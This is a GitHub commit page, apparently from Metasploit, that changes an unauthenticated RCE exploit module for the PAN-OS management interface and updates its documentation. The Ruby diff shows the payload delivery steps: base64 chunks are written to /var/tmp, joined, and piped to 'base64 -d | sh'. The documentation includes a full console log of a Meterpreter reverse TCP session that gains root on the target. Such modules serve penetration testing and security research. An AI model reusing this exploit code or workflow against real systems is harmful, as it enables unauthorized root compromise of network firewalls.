Skip to content

Commit d2f6e0e

Browse files
sfewer-r7sfewer-r7
committed
As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change.
1 parent f9b099a commit d2f6e0e

File tree

2 files changed

+51
-53
lines changed

2 files changed

+51
-53
lines changed

documentation/modules/exploit/linux/http/panos_management_unauth_rce.md

Lines changed: 41 additions & 49 deletions
Original file line numberDiff line numberDiff line change
@@ -31,6 +31,12 @@ payload `cmd/linux/http/x64/meterpreter_reverse_tcp`.
3131
6. `check`
3232
7. `exploit`
3333

34+
## Options
35+
36+
### WRITABLE_DIR
37+
The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
38+
payload as a series if chunks to this location, before executing the payload. The written artifacts are then deleted.
39+
3440
## Scenarios
3541

3642
### Default
@@ -40,43 +46,29 @@ msf6 exploit(linux/http/panos_management_unauth_rce) > show options
4046
4147
Module options (exploit/linux/http/panos_management_unauth_rce):
4248
43-
Name Current Setting Required Description
44-
---- --------------- -------- -----------
45-
Proxies no A proxy chain of format type:host:port[
46-
,type:host:port][...]
47-
RHOSTS 192.168.86.98 yes The target host(s), see https://docs.me
48-
tasploit.com/docs/using-metasploit/basi
49-
cs/using-metasploit.html
50-
RPORT 443 yes The target port (TCP)
51-
SSL true no Negotiate SSL/TLS for outgoing connecti
52-
ons
53-
VHOST no HTTP server virtual host
54-
55-
56-
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
57-
58-
Name Current Setting Required Description
59-
---- --------------- -------- -----------
60-
FETCH_COMMAND WGET yes Command to fetch payload (Acc
61-
epted: CURL, FTP, TFTP, TNFTP
62-
, WGET)
63-
FETCH_DELETE false yes Attempt to delete the binary
64-
after execution
65-
FETCH_FILENAME DVtyQpcA no Name to use on remote system
66-
when storing payload; cannot
67-
contain spaces or slashes
68-
FETCH_SRVHOST no Local IP to use for serving p
69-
ayload
70-
FETCH_SRVPORT 8080 yes Local port to use for serving
71-
payload
72-
FETCH_URIPATH no Local URI to use for serving
73-
payload
74-
FETCH_WRITABLE_DI /var/tmp yes Remote writable dir to store
75-
R payload; cannot contain space
76-
s
77-
LHOST eth0 yes The listen address (an interf
78-
ace may be specified)
79-
LPORT 4444 yes The listen port
49+
Name Current Setting Required Description
50+
---- --------------- -------- -----------
51+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
52+
RHOSTS 192.168.86.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
53+
RPORT 443 yes The target port (TCP)
54+
SSL true no Negotiate SSL/TLS for outgoing connections
55+
VHOST no HTTP server virtual host
56+
WRITABLE_DIR /var/tmp yes The full path of a writable directory on the target.
57+
58+
59+
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
60+
61+
Name Current Setting Required Description
62+
---- --------------- -------- -----------
63+
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
64+
FETCH_DELETE false yes Attempt to delete the binary after execution
65+
FETCH_FILENAME pHLZiKRnmfR no Name to use on remote system when storing payload; cannot contain spaces or slashes
66+
FETCH_SRVHOST no Local IP to use for serving payload
67+
FETCH_SRVPORT 8080 yes Local port to use for serving payload
68+
FETCH_URIPATH no Local URI to use for serving payload
69+
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces
70+
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
71+
LPORT 4444 yes The listen port
8072
8173
8274
Exploit target:
@@ -90,29 +82,29 @@ Exploit target:
9082
View the full module info with the info, or info -d command.
9183
9284
msf6 exploit(linux/http/panos_management_unauth_rce) > check
93-
[+] 192.168.86.98:443 - The target is vulnerable.
85+
[+] 192.168.86.100:443 - The target is vulnerable.
9486
msf6 exploit(linux/http/panos_management_unauth_rce) > exploit
9587
9688
[*] Started reverse TCP handler on 192.168.86.42:4444
9789
[*] Running automatic check ("set AutoCheck false" to disable)
9890
[+] The target is vulnerable.
99-
[*] Uploading payload chunk 1 of 8...
100-
[*] Uploading payload chunk 2 of 8...
101-
[*] Uploading payload chunk 3 of 8...
102-
[*] Uploading payload chunk 4 of 8...
103-
[*] Uploading payload chunk 5 of 8...
104-
[*] Uploading payload chunk 6 of 8...
105-
[*] Uploading payload chunk 7 of 8...
106-
[*] Uploading payload chunk 8 of 8...
91+
[*] Uploading payload chunk 1 of 7...
92+
[*] Uploading payload chunk 2 of 7...
93+
[*] Uploading payload chunk 3 of 7...
94+
[*] Uploading payload chunk 4 of 7...
95+
[*] Uploading payload chunk 5 of 7...
96+
[*] Uploading payload chunk 6 of 7...
97+
[*] Uploading payload chunk 7 of 7...
10798
[*] Amalgamating payload chunks...
10899
[*] Executing payload...
109-
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.98:52364) at 2024-11-19 15:16:55 +0000
100+
[*] Sending stage (3045380 bytes) to 192.168.86.100
101+
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000
110102
111103
meterpreter > getuid
112104
Server username: root
113105
meterpreter > sysinfo
114-
Computer : 192.168.86.98
115-
OS : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
106+
Computer : 192.168.86.100
107+
OS : Red Hat (Linux 4.18.0-240.1.1.28.pan.x86_64)
116108
Architecture : x64
117109
BuildTuple : x86_64-linux-musl
118110
Meterpreter : x64/linux

modules/exploits/linux/http/panos_management_unauth_rce.rb

Lines changed: 10 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -48,6 +48,7 @@ def initialize(info = {})
4848
'DefaultOptions' => {
4949
'RPORT' => 443,
5050
'SSL' => true,
51+
# A writable directory on the target for fetch based payloads to write to.
5152
'FETCH_WRITABLE_DIR' => '/var/tmp'
5253
},
5354
'DefaultTarget' => 0,
@@ -58,6 +59,11 @@ def initialize(info = {})
5859
}
5960
)
6061
)
62+
register_options(
63+
[
64+
OptString.new('WRITABLE_DIR', [true, 'The full path of a writable directory on the target.', '/var/tmp'])
65+
]
66+
)
6167
end
6268

6369
# Our check routine leverages the two vulnerabilities to write a file to disk, which we then read back over HTTPS to
@@ -103,7 +109,7 @@ def check
103109
def exploit
104110
tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
105111

106-
cmd = "rm -f #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}"
112+
cmd = "rm -f #{datastore['WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}"
107113

108114
payload = Base64.strict_encode64(cmd)
109115

@@ -121,18 +127,18 @@ def exploit
121127

122128
payload = payload[chunk_size..]
123129

124-
execute_cmd("echo -n '#{chunk}'>#{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
130+
execute_cmd("echo -n '#{chunk}'>#{datastore['WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
125131

126132
idx += 1
127133
end
128134

129135
print_status('Amalgamating payload chunks...')
130136

131-
execute_cmd("cat #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}* > #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}")
137+
execute_cmd("cat #{datastore['WRITABLE_DIR']}/#{tmp_file_name}* > #{datastore['WRITABLE_DIR']}/#{tmp_file_name}")
132138

133139
print_status('Executing payload...')
134140

135-
execute_cmd("cat #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name} | base64 -d | sh", dontfail: true)
141+
execute_cmd("cat #{datastore['WRITABLE_DIR']}/#{tmp_file_name} | base64 -d | sh", dontfail: true)
136142
end
137143

138144
def execute_cmd(cmd, dontfail: false)

0 commit comments

Comments
 (0)